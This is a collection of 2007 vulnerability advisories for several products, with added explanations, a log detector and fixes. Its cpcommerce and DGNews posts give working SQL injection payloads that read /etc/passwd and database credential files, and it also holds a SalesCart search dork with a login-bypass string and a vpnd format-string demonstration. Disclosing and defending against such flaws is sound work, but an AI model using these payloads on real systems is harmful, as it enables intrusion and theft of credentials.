n.runs-SA-2007.011 - Avira Antivir Antivirus UPX parsing Divide by Zero Advisory
n.runs AG
http://www.nruns.com/
security(at)nruns.com

n.runs-SA-2007.011                                          29-May-2007

Vendor:             Avira GmbH, http://www.avira.com
Affected Product:   Avira Antivir Antivirus
Vulnerability:      Divide by Zero Engine DoS (remote)
Risk:               HIGH

Vendor communication:
  2007/05/07  Initial notification to Avira GmbH
  2007/05/07  Avira GmbH response
  2007/05/08  PGP public key exchange
  2007/05/09  PoC files sent to Avira GmbH
  2007/05/10  Avira GmbH acknowledged and validated the PoC files
  2007/05/16  Avira GmbH sent fix release schedule and fixed engine
  2007/05/17  Sergio Alvarez tested fixed engine
  2007/05/23  Avira GmbH released update with fixes

Overview:
Avira, a company with over 15 million customers and more than 250 employees, is a worldwide leading supplier of self-developed security solutions for professional and private use. With more than 20 years of experience, the company is one of the pioneers in this field. In addition to programs specifically for use on single workstations, Avira primarily offers professional solutions for cross-system protection of networks on various levels. These include products for workstations, file, mail and web servers. Gateway computers can be managed as workstation computers via a central management console for all operating systems. In addition to the management products of the individual solutions, security programs for PDAs, smartphones and embedded devices are also offered. Avira AntiVir Personal, used by millions of private users, represents a significant contribution to security.

Description:
A remotely exploitable vulnerability has been found in the file parsing engine. In detail, the following flaw was determined:
  - Divide by Zero in UPX packed file parsing

Impact:
This problem can lead to a remote engine denial of service if an attacker carefully crafts a file that exploits the aforementioned vulnerability. The vulnerability is present in Avira Antivir Antivirus software versions prior to update version 7.03.00.09.

Solution:
The vulnerability was reported on 07.May.2007 and an update was issued on 23.May.2007 that fixes this vulnerability through the regular update mechanism.

Credit:
Bug found by Sergio Alvarez of n.runs AG.

References:
http://forum.antivir-pe.de/thread.php?threadid=22528

This Advisory and Upcoming Advisories:
http://www.nruns.com/parsing-engines-advisories.php

Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact [EMAIL PROTECTED] for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages.

Copyright 2007 n.runs AG. All rights reserved. Terms of apply.
Full Path Disclosure in Almnzm
Hello

Vulnerable: Almnzm
Web:        http://www.almnzm.com

Exploit:
http://example.com/almnzm/index.php?action=activateorder&orderid=['Anything']

Discovered by Linux_Drox
www.LeZr.Com

Best Regards
cpcommerce < v1.1.0 [sql injection]
Vendor site: http://cpcommerce.cpradio.org/
Product:     cpcommerce < v1.1.0
Bug:         SQL injection
Risk:        high
Note:        works regardless of php.ini settings.

http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,LOAD_FILE(0x2F6574632F706173737764),0/**/from/**/cpAccounts/*

// result:
Information about '8725ade7b722d1ad43b7b949162eab4d'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
...

http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,email,0/**/from/**/cpAccounts/*

// result:
Information about '8725ade7b722d1ad43b7b949162eab4d'
[EMAIL PROTECTED]

Read the database credentials in plain text:

http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263652F5F636F6E6669672E706870),pass,0/**/from/**/cpAccounts/*

// result:
Products in '..
// Database Information
$config['host'] = "localhost";     // Database Host
$config['user'] = "my_user";       // Database Username
$config['pass'] = "my_password";   // Database Password
$config['database'] = "hi";        // Database Name
$config['prefix'] = "cp";
...
'8725ade7b722d1ad43b7b949162eab4d'

ps1: 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263652F5F636F6E6669672E706870 --> /usr/local/apache2/htdocs/cpcommerce/_config.php

ps2: /**/cpAccounts/* --> cp = prefix, Accounts = table name (cp is the default one), so you can try with your own table prefix.

regards
laurent gaffie
Re: DGNews version 2.1 SQL Injection Vulnerability
hi there

there's also another sql injection in this script:

news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7%20from%20news_comment/*

// result:
"This news has 1 comments. Please read, or post one by click here.
* 5 (by: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:..."

read the database credentials in plain text:

news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870),4,5,6,7%20from%20news_comment/*

// the information is in the page source.

* 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870 = /usr/local/apache2/htdocs/dgnews/admin/conn.php

ps: works regardless of php.ini settings.

regards
laurent gaffie
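The cpcommerce and DGNews payloads above share one trick: the file name handed to LOAD_FILE() is written as a MySQL hex literal (0x2F65...) or as char(47,101,...), so the request contains no quote character and magic_quotes_gpc has nothing to escape, which is what "works regardless of php.ini settings" means. The following is an added example, not code from either post: it decodes both literal forms (the DGNews hex decodes to admin/conn.php) and runs a simple detector over constructed access-log lines that reuse the two request strings from the posts. The log lines and the regular expressions are this example's own assumptions.

```python
"""Decode the quote-free LOAD_FILE() arguments from the cpcommerce and DGNews
UNION SELECT injections and flag such requests in an access log.

Added example, not code from either post. ACCESS_LOG is constructed here."""
import re
from urllib.parse import unquote_plus


def decode_hex_literal(lit):
    """MySQL 0x... literal -> the string the server builds from it."""
    digits = lit[2:] if lit[:2].lower() == "0x" else lit
    if len(digits) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", digits):
        raise ValueError("malformed hex literal: %r" % lit)
    return bytes.fromhex(digits).decode("latin-1")


def decode_char_call(lit):
    """MySQL char(47,101,...) -> the string it builds."""
    m = re.fullmatch(r"\s*char\s*\(([0-9,\s]+)\)\s*", lit, re.IGNORECASE)
    if not m:
        raise ValueError("not a char() call: %r" % lit)
    return "".join(chr(int(n)) for n in m.group(1).split(","))


# Either literal form inside LOAD_FILE( ... ).
_LOAD_FILE = re.compile(
    r"load_file\s*\(\s*(0x[0-9a-f]+|char\s*\([0-9,\s]+\))\s*\)", re.IGNORECASE)
_UNION_SELECT = re.compile(r"\bunion\s+select\b", re.IGNORECASE)


def normalize(request_uri):
    """Undo %XX and '+' encoding, then turn the /**/ comment-as-space trick
    (used by the cpcommerce payload) back into plain whitespace."""
    return re.sub(r"/\*.*?\*/", " ", unquote_plus(request_uri))


def load_file_targets(request_uri):
    """Decoded paths the request asks LOAD_FILE() to read, in order."""
    targets = []
    for m in _LOAD_FILE.finditer(normalize(request_uri)):
        arg = m.group(1)
        if arg[:2].lower() == "0x":
            targets.append(decode_hex_literal(arg))
        else:
            targets.append(decode_char_call(arg))
    return targets


def is_union_injection(request_uri):
    return _UNION_SELECT.search(normalize(request_uri)) is not None


# Constructed sample lines; the first two carry the requests from the posts.
ACCESS_LOG = [
    '10.0.0.5 - - [30/May/2007:10:00:00 +0000] "GET /cpcommerce/manufacturer.php'
    '?id_manufacturer=-9/**/union/**/select/**/pass,LOAD_FILE(0x2F6574632F706173737764),0'
    '/**/from/**/cpAccounts/* HTTP/1.1" 200 4120',
    '10.0.0.5 - - [30/May/2007:10:01:12 +0000] "GET /dgnews/news.php?go=fullnews&newsid=-9'
    '+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7'
    '%20from%20news_comment/* HTTP/1.1" 200 3001',
    '10.0.0.7 - - [30/May/2007:10:02:40 +0000] "GET /cpcommerce/manufacturer.php'
    '?id_manufacturer=12 HTTP/1.1" 200 2200',
]


def scan_log(lines):
    """(script path, [decoded LOAD_FILE targets]) for every UNION SELECT request."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m and is_union_injection(m.group(1)):
            hits.append((m.group(1).split("?", 1)[0], load_file_targets(m.group(1))))
    return hits


if __name__ == "__main__":
    for script, paths in scan_log(ACCESS_LOG):
        print(script, "->", paths or "no LOAD_FILE")
```

The detector is deliberately narrow (literal `union select` after comment and URL decoding); in practice the durable fix on the application side is casting id_manufacturer and newsid to an integer before they reach the query, and on the database side revoking the FILE privilege from the web application's MySQL account so LOAD_FILE() returns NULL.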
[security bulletin] HPSBUX02087 SSRT4728 rev.5 - HP-UX running TCP/IP Remote Denial of Service (DoS)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00579189
Version: 5

HPSBUX02087 SSRT4728 rev.5 - HP-UX running TCP/IP Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2005-12-09
Last Updated: 2007-05-21

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running TCP/IP. The potential vulnerability could be exploited remotely to cause a Denial of Service (DoS).

References: CVE-2004-0744

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.04, B.11.11, B.11.23 running TCP/IP.

BACKGROUND
To determine if an HP-UX system has an affected version, search the output of "swlist -a revision -l fileset" for one of the filesets listed below. For affected systems verify that the recommended action has been taken.

AFFECTED VERSIONS

HP-UX B.11.00
=============
Streams.STREAMS-KRN
action: install PHNE_30161 or subsequent

HP-UX B.11.04
=============
Networking.NET-KRN
action: install PHNE_33427 or subsequent and install sqmax (see Resolution section)

HP-UX B.11.11
=============
Streams.STREAMS-KRN
action: install PHNE_34131 or subsequent

HP-UX B.11.23
=============
Streams.STREAMS2-KRN
action: install PHKL_31500 or subsequent

END AFFECTED VERSIONS

RESOLUTION
HP has made patches and product updates available to resolve the issue. After installing the recommended patches for B.11.04 a system parameter must be set. A utility, sqmax, must be downloaded and installed to set the required system parameter as discussed below.

B.11.00  install PHNE_30161 or subsequent, sqmax not required
B.11.04  install PHNE_33427 or subsequent, then install sqmax as discussed below
B.11.11  install PHNE_34131 or subsequent, sqmax not required
B.11.23  install PHKL_31500 or subsequent, sqmax not required

The patches are available from http://itrc.hp.com

For B.11.04: After the patches listed above are installed an internal system parameter must be set. A utility, sqmax, has been provided to set the parameter. The sqmax utility is available by writing to [EMAIL PROTECTED]

MANUAL ACTIONS: Yes - NonUpdate
B.11.04 - After installing the patch, install sqmax. Run "/usr/contrib/bin/sqmax 1000" or reboot.

PRODUCT SPECIFIC INFORMATION
HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information:
http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA

HISTORY
Version:1 (rev.1) 14 December 2005 Initial release
Version:2 (rev.2) 24 July 2006 New sqmax utility for B.11.04, augmented installation instructions
Version:3 (rev.3) 31 July 2006 PHNE_34131 is available for B.11.11
Version:4 (rev.4) 09 October 2006 PHNE_30161 is available for B.11.00
Version:5 (rev.5) 21 May 2007 Corrected fileset information for PHNE_30161

Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP =
RedLevel Advisory #23 - SalesCart Shopping Cart SQL Injection Vulnerability
SalesCart Shopping Cart - SQL Injection Vulnerability

SalesCart does not sanitize any forms in cgi-bin/reorder2.asp, allowing an attacker to inject arbitrary SQL queries, as well as possibly execute commands.

Google dork: "Sorry, you have no Items in your Shopping Cart !" inurl:cgi-bin/view1.asp

Vulnerable Variable: All forms in reorder2.asp
Vulnerable File:     cgi-bin/reorder2.asp (password: x' OR 'x'='x)

Vendor Status: Notified multiple times, no response. Possible silent patch.

John Martinelli
[EMAIL PROTECTED]
RedLevel Security
RedLevel.org
May 30th, 2007
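The password value quoted in the advisory, x' OR 'x'='x, is a tautology injection: the closing quote ends the password literal and the OR makes the WHERE clause true for every row. Below is an added example (not SalesCart's code) that runs that value against a query built by string concatenation, as classic ASP pages do, and against a parameterized query. The accounts table, its single row and the query text are assumptions standing in for whatever reorder2.asp really executes; SQLite is used only so the example runs offline.

```python
"""Tautology login bypass (password: x' OR 'x'='x) against a string-built
query, next to the parameterized form that is immune.

Added example, not SalesCart's code: table, row and query are assumptions."""
import sqlite3

BYPASS = "x' OR 'x'='x"   # the password value quoted in the advisory


def make_db():
    """In-memory stand-in for the shop's user table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    db.execute("INSERT INTO accounts VALUES ('alice', 's3cret')")
    db.commit()
    return db


def login_concat(db, username, password):
    """Vulnerable: form fields glued into the SQL text.

    With password = BYPASS the clause reads
        username='x' AND password='x' OR 'x'='x'
    and AND binds tighter than OR, so every row satisfies it."""
    sql = ("SELECT COUNT(*) FROM accounts WHERE username='%s' AND password='%s'"
           % (username, password))
    return db.execute(sql).fetchone()[0] > 0


def login_param(db, username, password):
    """Fixed: placeholders keep the quote inside the data; no row matches."""
    sql = "SELECT COUNT(*) FROM accounts WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    print("concat, bypass:", login_concat(db, "x", BYPASS))       # True
    print("param,  bypass:", login_param(db, "x", BYPASS))        # False
    print("param,  valid: ", login_param(db, "alice", "s3cret"))  # True
```

The "possible command execution" the advisory mentions is not shown here: it depends on the backend (on SQL Server it would mean a stacked query reaching a procedure such as xp_cmdshell), which the advisory does not identify.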
Apache httpd vulnerabilities
PSNC Security Team has the pleasure to announce that, as a result of Apache httpd server (ver. 1.3.x, 2.0.x and 2.2.x) source code analysis, several vulnerabilities have been found that make it possible to perform a DoS attack against the services and the system that the application is running on. Basic information on the vulnerabilities found follows.

Vuln #1 Httpd Server DoS
Test environment: ver. 2.0.59, 2.2.4, prefork MPM module
Appropriate code run in the worker process context makes it possible to kill all worker processes while simultaneously blocking the creation of new worker processes by the master process. As a result, the server stops accepting and handling new connections.

Vuln #2 SIGUSR1 killer
Test environment: ver. 2.0.59, 2.2.4, prefork MPM module
Appropriate code run in the worker process context makes it possible to have the master process (which runs with root credentials) send SIGUSR1 signals to an arbitrary process within the system.

Vuln #3 SIGUSR1 killer
Test environment: ver. 1.3.37
Appropriate code run in the worker process context makes it possible to have the master process (which runs with root credentials) send SIGUSR1 signals to an arbitrary process within the system.

Vuln #4 System DoS
Test environment: ver. 2.0.59, 2.2.4, prefork MPM module
Appropriate code run in the worker process context makes it possible to force the master process to create an unlimited number of new worker processes. As a result, the activity of the whole system may be blocked.

Countermeasures:
Disable the possibility of running user code in the worker process context. Special emphasis should be put on programming languages that may be configured as an Apache module (like mod_php, mod_perl etc.) in order to block dangerous functions, e.g. dl(), dlopen().

The information on the vulnerabilities above was sent to the Apache Software Foundation on 16 May, 2006. For over 1 year no official patch has been issued.

PSNC Security Team is currently working on its own, unofficial patches. Our patches will be published on 18 June, 2007 on the team webpage (http://security.psnc.pl). On 20 June, 2007 the detailed information on the vulnerabilities found will be issued.

PSNC Security Team
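All four findings start from native code running inside a worker process, and the countermeasure named above is to take that capability away from scripting modules. As an added example, not PSNC's patch and not Apache's or PHP's own configuration, this is what the dl() part of that advice looks like in php.ini for a mod_php build; the directive names are real PHP settings, and which further functions a site adds to disable_functions is that site's decision.

```ini
; Added example (not PSNC's patch): php.ini for a mod_php worker,
; implementing the advisory's advice to block dl().
enable_dl = Off          ; dl() refuses to load extensions at runtime
disable_functions = dl   ; and the function is removed from the engine entirely
```

Both settings are PHP_INI_SYSTEM, so a script cannot turn them back on with ini_set() and a .htaccess file cannot override them. From PHP 5.3 on, dl() is unavailable under the Apache SAPI regardless of enable_dl, so this matters most for the PHP 5.2 installs current at the time of the post. It covers only PHP: mod_perl and other in-process interpreters need their own restrictions, and none of this touches the signalling behaviour in httpd itself, which is what PSNC's unofficial patches are meant to address.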
Re: Mac OS X vpnd local format string
OSX client is also vulnerable and exploitable.

-KF

On May 29, 2007, at 7:26 AM, NGSSoftware Insight Security Research wrote:

> [quoted NGS advisory omitted here; it is reproduced in full under "Mac OS X vpnd local format string" below]
[MajorSecurity Advisory #48]eggblog - Session fixation Issue
[MajorSecurity Advisory #48] eggblog - Session fixation Issue

Details
=======
Product:          eggblog
Affected version: 3.1.0 and prior
Remote-Exploit:   yes
Vendor-URL:       http://www.eggblog.net
Vendor-Status:    informed
Advisory-Status:  published

Credits
=======
Discovered by: David Vieira-Kurz
http://www.majorsecurity.de

Original Advisory:
http://www.majorsecurity.de/index_2.php?major_rls=major_rls48

Introduction
============
"eggblog is a free php & mysql package, allowing you to create your own online website, journal or weblog (blog)."
-from eggblog.net

More Details
============
1. Session fixation:
The "PHPSESSID" parameter can be set to a malicious and arbitrary value.

1.1 Description:
In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server. After a user's session ID has been fixed, the attacker waits for them to log in. Once the user does so, the attacker uses the predefined session ID value to assume their online identity.

Workaround:
1. Do not accept session identifiers from GET / POST variables.
2. Regenerate the SID on each request.
3. Accept only server-generated SIDs: one way to improve security is to not accept session identifiers that were not generated by the server.

    <?php
    session_start();
    if (!isset($_SESSION['SERVER_GENERATED_SID'])) {
        session_unset();              // drop whatever came with a client-chosen ID
    }
    session_regenerate_id(true);      // fresh server-generated ID; the old one is deleted
    $_SESSION['SERVER_GENERATED_SID'] = true;

History/Timeline
================
25.05.2007 discovery of the vulnerability
27.05.2007 contacted the vendor
27.05.2007 working patch sent to the vendor
29.05.2007 advisory is written
29.05.2007 advisory released

MajorSecurity
=============
MajorSecurity is a non-profit German penetration testing and security research project which consists of only one person at the present time.
http://www.majorsecurity.de/
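The attack and the two workarounds can be played through end to end with a small model of a PHP-style session handler. The following is an added example, not eggblog's code: the in-memory dictionary stands in for PHP's session files, the planted ID is a constructed value, and the "accept any ID the client presents" behaviour mirrors PHP's default of that era (later PHP versions expose it as session.use_strict_mode).

```python
"""Session fixation against a PHP-style session handler, with the two
defences from the workaround: accept only server-issued IDs, and
regenerate the ID at login.

Added example, not eggblog's code; store and planted ID are constructed."""
import secrets


class SessionStore:
    """Minimal model of session_start() / login / lookup."""

    def __init__(self, accept_client_ids, regenerate_on_login):
        self.sessions = {}                      # sid -> session data
        self.accept_client_ids = accept_client_ids
        self.regenerate_on_login = regenerate_on_login

    def _issue(self):
        """Server-generated ID, tagged the way workaround 3 tags it."""
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"SERVER_GENERATED_SID": True}
        return sid

    def start(self, presented_sid):
        """Return the SID the response cookie carries for this request."""
        if presented_sid in self.sessions:
            return presented_sid
        if presented_sid is not None and self.accept_client_ids:
            # PHP default (session.use_strict_mode = 0): adopt any unknown ID
            # the client presents, e.g. one planted through ?PHPSESSID=...
            self.sessions[presented_sid] = {}
            return presented_sid
        return self._issue()                    # unknown ID rejected: fresh one

    def login(self, sid, user):
        """Bind the user to the session; optionally move it to a new ID first."""
        if self.regenerate_on_login:
            data = self.sessions.pop(sid)       # the old ID stops working
            sid = self._issue()
            self.sessions[sid].update(data)
        self.sessions[sid]["user"] = user
        return sid

    def whoami(self, sid):
        return self.sessions.get(sid, {}).get("user")


PLANTED_SID = "0123456789abcdef0123456789abcdef"   # constructed attacker-chosen value


def fixation_attack(accept_client_ids, regenerate_on_login):
    """Attacker plants PLANTED_SID in the victim's browser; the victim logs in;
    the attacker then presents the same ID. Returns who the server takes the
    attacker to be, or None if the attack failed."""
    store = SessionStore(accept_client_ids, regenerate_on_login)
    victim_sid = store.start(PLANTED_SID)
    store.login(victim_sid, "victim")
    return store.whoami(PLANTED_SID)


if __name__ == "__main__":
    print("accept any ID, no regeneration:", fixation_attack(True, False))   # victim
    print("server IDs only:               ", fixation_attack(False, False))  # None
    print("regenerate at login:           ", fixation_attack(True, True))    # None
```

Either defence alone breaks the attack in this model; in real deployments both are used, because regenerating at login protects the login boundary while refusing unknown IDs also stops the attacker from pre-seeding session data before the victim arrives.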
Mac OS X vpnd local format string
=== Summary ===
Name: Mac OS X vpnd local format string
Release Date: 29 May 2007
Reference: NGS00496
Discoverer: Chris Anley <[EMAIL PROTECTED]>
Vendor: Apple
Vendor Reference: 26417237
CVE-ID: CVE-2007-0753
Systems Affected: OS X Server 10.4.9 and prior
Risk: High
Status: Published

=== TimeLine ===
Discovered: 15 March 2007
Reported: 19 March 2007
Fixed: 24 May 2007
Published: 29 May 2007

=== Description ===
The 'vpnd' command shipped with OS X runs setuid root, and is vulnerable to a format string attack.

=== Technical Details ===
The vpnd command, when run with the '-i' parameter, is vulnerable to a format string attack. The command is setuid root, and is world-executable. This allows any local user to execute arbitrary code as root, though the vulnerable code is only accessible by default on server versions of OS X. It is possible for a client version of OS X to be configured in a vulnerable manner, though this requires extensive configuration changes and is unlikely to happen by accident.

Demonstration:

Apple:~ shellcoders$ sw_vers
ProductName:    Mac OS X Server
ProductVersion: 10.4.9
BuildVersion:   8P135
Apple:~ shellcoders$ vpnd -n -i _ABCD_%268\$x
2007-03-15 17:07:07 GMT Server '_ABCD_%268$x' starting...
2007-03-15 17:07:07 GMT Server ID '_ABCD_41424344' invalid
2007-03-15 17:07:07 GMT Error processing prefs file

(gdb) bt
#0  0x90011cb8 in __vfprintf ()
#1  0x9002a90c in vsnprintf ()
#2  0x9002a41c in vsyslog ()
#3  0x3150 in vpnlog ()
#4  0x4b80 in process_prefs ()
#5  0x28d4 in main ()

The source code for vpnd is available from the Apple Darwin source code download site. The relevant code is in the ppp package. The code is distributed under the Apple Public Source License, available at http://www.opensource.apple.com/apsl/

The bug occurs in the process_prefs() function in vpnoptions.c. The user-specified server name is passed into the snprintf() function as data, and the resulting string is then passed to the vpnlog() function as the format_str parameter. Although the server name is limited to 64 characters (with '%.64s'), it is still straightforward to exploit the bug, and NGS have written a reliable exploit.

=== Fix Information ===
This issue was fixed by Apple in Security Update 2007-005, released on the 24th May 2007.

NGS would like to thank the Apple Security Team for their professional and prompt response to this issue.

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402
myEvent version 1.6 Multiple Path Disclosure Vulnerabilities
netVigilance Security Advisory #24

myEvent version 1.6 Multiple Path Disclosure Vulnerabilities

Description:
myEvent is a dynamic calendar-based events management system with an admin panel for adding, editing and deleting events, built using PHP & MySQL. It displays today's event and future events as links on the calendar; an event is shown in one of 3 modes (pop-up, new window, or on the same screen) once its link is clicked. There is also a mouse-over tool tip to display the events. Template based and simple, easily integrated into any website.

External References:
Mitre CVE: CVE-2007-0690
NVD NIST: CVE-2007-0690
OSVDB: 34272

Summary:
myEvent is a dynamic calendar-based events management system with an admin panel for adding, editing and deleting events, built using PHP and MySQL. Multiple path disclosure vulnerabilities in the product allow attackers to gather the true path of the server-side script.

Advisory URL: http://www.netvigilance.com/advisory0024
Release Date: 05/28/2007

Severity:
Risk: Low
CVSS Metrics
  Access Vector: Remote
  Access Complexity: Low
  Authentication: Not-required
  Confidentiality Impact: Partial
  Integrity Impact: None
  Availability Impact: None
  Impact Bias: Normal
  CVSS Base Score: 2.3
  Target Distribution on Internet: Low
  Exploitability: Functional Exploit
  Remediation Level: Workaround
  Report Confidence: Uncorroborated

Vulnerability Impact: Attack
Host Impact: Path disclosure.
SecureScout Testcase ID: TC 17954
Vulnerable Systems: myEvent version 1.6
Vulnerability Type: Program flaw - The myevent.php and login.php scripts have flaws which lead to Warnings or even a Fatal Error.

Vendor: myWebland
Vendor Status: The vendor has been notified several times on many different email addresses, last on 15 May 2007. The vendor has not responded. There is no official fix at the release of this Security Advisory.

Workaround:
Disable warning messages: modify the following line in the php.ini file: display_errors = Off. Or modify the .htaccess file (this will work only for Apache servers).

Example:

Path Disclosure Vulnerability 1:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/myevent.php?monthno[]=2&year=2007
REPLY:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in [DISCLOSED PATH]\[PRODUCT-DIRECTORY]\initialize.php on line 71

Path Disclosure Vulnerability 2:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/myevent.php?view[]=1
REPLY:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in [DISCLOSED PATH]\[PRODUCT-DIRECTORY]\initialize.php on line 83

Path Disclosure Vulnerability 3:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/login.php
Enter a login but do not enter a password. Click "Log In".
REPLY:
Fatal error: Call to undefined function: notice() in [DISCLOSED PATH]\[PRODUCT-DIRECTORY]\login.php on line 29

Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
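The first two requests work because PHP turns a query parameter written as monthno[]=2 into an array, and initialize.php hands that array straight to htmlspecialchars(), whose warning message embeds the absolute path of the script. The advisory names the .htaccess route for the workaround without showing it; the following is an added example, not myEvent's or netVigilance's code, for an Apache host running PHP as mod_php. The log file location is an assumption.

```apache
# Added example (not myEvent's code): .htaccess implementing the advisory's
# workaround on Apache + mod_php. php_flag/php_value take effect only where
# AllowOverride Options (or All) applies; under CGI/FastCGI PHP they are
# ignored and display_errors must be set in php.ini instead.
php_flag  display_errors off
php_flag  log_errors     on
# Keep the disclosed path out of responses but visible to the administrator.
# Log location is an assumption; choose one outside the web root.
php_value error_log      /var/log/php_errors.log
```

This hides the path but leaves the underlying flaw in place: initialize.php and login.php still accept array-typed or missing input, so the warning (and, in the login.php case, the fatal error from the missing notice() function) still fires and is simply written to the log instead of the page.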